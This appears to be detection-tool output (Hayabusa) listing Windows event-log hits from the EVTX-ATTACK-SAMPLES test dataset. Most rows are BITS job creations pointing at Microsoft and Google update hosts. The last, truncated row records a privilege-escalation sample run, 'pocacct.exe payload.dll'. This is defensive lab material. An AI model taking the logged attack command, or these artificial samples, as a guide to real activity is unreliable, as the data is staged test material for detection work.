https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-12 00:56:12.802 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-12 00:56:12.899 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-12 00:56:12.906 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-12 00:56:12.910 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-12 00:56:12.913 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-12 19:56:13.148 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{9FF0B339-0202-4A5B-B73E-CFFB4FCBD124}-86.0.4240.193_86.0.4240.183_chrome_updater.exe | URL: http://r2---sn-5hne6nsy.gvt1.com/edgedl/release2/chrome/QX5U7YrFu2EjtutZ_UHwBg_86.0.4240.193/86.0.4240.193_86.0.4240.183_chrome_updater.exe?cms_redirect=yes&mh=qK&mip=213.127.67.111&mm=28&mn=sn-5hne6nsy&ms=nvh&mt=1605092117&mv=m&mvi=2&pl=17&shardbypass=yes,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-12 21:44:50.465 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-12 23:12:22.524 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aULGJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-12 23:12:25.568 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image1.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-13 19:12:09.946 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aYFdj.img?w=100&h=100&m=6&tilesize=medium&x=703&y=371&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-13 19:31:57.260 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-14 04:57:22.022 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-15 20:47:59.752 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-15 20:48:00.273 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-16 21:31:35.114 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-16 22:57:53.156 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-16 22:57:54.168 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-18 02:41:01.832 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-18 02:41:02.662 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-18 06:09:43.966 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b6mGJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-18 19:01:10.759 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b7AcJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-19 06:49:45.347 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-19 06:49:46.212 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-19 06:49:57.232 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{760E100C-4E23-45B0-A2E1-BB2607BF6ED4}-87.0.4280.66_86.0.4240.198_chrome_updater.exe | URL: http://r4---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/GIUtDEIRbSWI1y147Zo4bw_87.0.4280.66/87.0.4280.66_86.0.4240.198_chrome_updater.exe?cms_redirect=yes&mh=ls&mip=213.127.67.111&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1605736037&mv=m&mvi=4&pl=17&shardbypass=yes,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-19 18:04:09.949 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b9Paa.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-19 18:33:33.409 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b9S4l.img?w=100&h=100&m=6&tilesize=medium&x=1140&y=780&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-19 19:45:57.562 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aQJnx.img?w=100&h=100&m=6&tilesize=medium&x=1069&y=1223&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-20 02:49:15.102 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-20 02:49:15.960 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-21 20:12:30.660 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-21 20:12:31.102 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-21 20:16:44.077 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://storage.googleapis.com/update-delta/mimojjlkmoijpicakmndhoigimigcmbb/32.0.0.453/32.0.0.433/6a7cbd12b20a2b816950c10566b3db00371455731ff01526469af574701da085.crxd,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-21 20:18:47.864 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://storage.googleapis.com/update-delta/gcmjkmgdlgnkkcocmoeiminaijmmjnii/9.18.0/9.16.0/ce6075b044b6a23d590819332659310fbc6327480d4ce28d85700575fd1d389b.crxd,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-21 20:19:01.301 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://storage.googleapis.com/update-delta/khaoiebndkojlmppeemjhbpbandiljpe/43/42/e0b8b1fb7c27acac43c236b9f6b029b07f2a3b661b5d8eed22848180aaf4f04e.crxd,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-21 20:19:08.126 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/KbGq9i1aCJZgbOKmNv6oJQ_6252/VL8i_VzJSassyW3AF-YJHg,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-21 20:19:17.194 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/ONVXH2AuMZGs-h196MV_Rg_2505/bYFE7q-GLInSBxc008hucw,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-21 20:19:21.164 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/APhHMzuprJvS7ixvnAk_gdI_1/anGnv31dmOJhheXBnYQ3gw,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-21 20:19:25.377 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/AJqZYiqGvCtix64S2N84g-M_2020.11.2.164946/EWvH2e-LS80S29cxzuTfRA,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-21 20:19:34.726 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/Z0dgM6Cm_Rt2z0LEtvtuMA_2020.11.16.1201/AIpG92DElyR2vE9pGKmvVoc,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-21 20:50:16.788 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1begCn.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-21 20:50:17.148 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image2.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-22 00:54:58.415 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-22 00:54:59.449 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-22 01:00:56.714 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bdETn.img?w=100&h=100&m=6&tilesize=medium&x=1080&y=363&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-22 01:00:57.346 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image1.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-23 19:46:03.984 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bgw4d.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-23 19:46:04.676 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image3.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-23 19:52:42.355 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-23 19:52:43.097 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-23 20:05:14.300 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bh3sJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-23 21:44:11.565 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-23 21:46:56.224 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-23 21:46:56.973 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-23 23:09:10.403 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhxvH.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-24 00:34:38.147 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhAo3.img?w=100&h=100&m=6&tilesize=medium&x=1228&y=258&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-24 00:41:52.668 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhEQI.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-24 21:47:56.181 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-24 21:47:57.912 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-25 06:06:52.429 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aV2sK.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-25 08:55:56.229 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bkiYw.img?w=100&h=100&m=6&tilesize=medium&x=1094&y=441&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-25 18:56:29.274 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://storage.googleapis.com/update-delta/gkmgaooipdjhmangpemjhigmamcehddo/86.249.200/84.243.200/17f6e5d11e18da93834a470f7266ede269d3660ac7a4c31c0d0acdb0c4c34ba2.crxd,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-25 18:57:51.221 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/AN67dIUbQty67HoEacsJ61c_6260/APHk7sg8XbALFcVmjTty4CQ,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-25 18:57:59.420 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/Jo7Lnj2MkXB5ezNave49dw_2509/AOHc3HV2drrDzlxLOXeJFhs,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-25 23:04:33.703 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-25 23:04:36.013 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-26 19:44:49.642 +09:00,02694w-win10.threebeesco.com,1,info,,Process Created,"Cmd: pocacct.exe payload.dll | Process: C:\Users\lgreen\Downloads\PrivEsc\pocacct.exe | User: 3B\lgreen | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x2dfbe | PID: 6320 | PGUID: 